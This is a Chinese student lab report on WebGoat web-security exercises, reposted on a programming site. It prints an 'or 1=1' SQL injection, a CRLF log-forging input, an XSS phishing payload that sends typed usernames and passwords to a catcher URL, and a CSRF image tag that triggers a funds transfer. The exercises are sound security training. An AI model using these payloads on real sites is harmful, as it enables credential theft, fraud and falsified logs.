目录
inspect Element
按键盘f12
查看网页源代码点击
vIEw
按钮,执行代码结果如下:2. 数字注入 攻击过程:在表单输入中输入数字生成永真式,使得注入的SQL语句必定可以执行。 实验过程: 在实验网页上查看源代码,对
value=‘101‘
进行修改,添加or 1=1
构成永真式,如图:点击按钮执行,结果如下:
3. 日志欺骗 攻击过程:不法分子通过在注入脚本,通过脚本修改日志文件。 实验过程: 在实验环境提供的表单中输入
2329%0d%0aLogin Succeeded for username: 162329
其中%0d
和%0a
为回车符和换行符。 结果如下图:三、XSS攻击 1. XSS钓鱼攻击 攻击过程:通过表单输入脚本,修改网页HTML,生成钓鱼网站,当用户输入时获取用户输入的信息。 实验过程: 在实验环境表单中输入脚本代码,构造钓鱼界面。 界面代码如下:
<form><br><br><HR><H3>This feature requires account login:</H3 ><br><br> Enter Username:<br><input type="text" ID="user" name="user"><br> Enter Password:<br><input type="password" name = "pass"><br> </form><br><br><HR><script>function Hack(){ alert("Had this been a real attack... Your credentials were just stolen." User name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user="+ document.forms[0].user.value + "&password=" + document.forms[0].pass.value + ";}</script>将以上代码输入搜索框中,点击搜索如图:
当用户点击提交时攻击者界面会出现如下图:
四、CSRF攻击 1. 跨站请求伪造 攻击过程: 给用户发送一个恶意URL诱使其他用户点击,从而触发CSRF攻击。为了使用户更容易受骗,我们可以以图片的形式隐藏URL。 实验过程: 查看参数中src和menu值,为261和900 在message框中输入
<img src="http://localhost:8080/WebGoat/attack? Screen=261&menu=900&transferFunds=2329"/>
点击提交后结果如下:当用户点击Message字段中的图片时就会盗取用户2329元 五、实验总结与体会
通过本次实验真实的感受了什么是sql注入,XSS攻击和CRSF攻击,在实验中了解了其中的流程,也自己总结了对这些攻击的防御方法,感觉受益匪浅。
总结以上是内存溢出为你收集整理的2018-2019-2 20162329 《网络对抗技术》Exp9: Web安全基础全部内容,希望文章能够帮你解决2018-2019-2 20162329 《网络对抗技术》Exp9: Web安全基础所遇到的程序开发问题。
如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)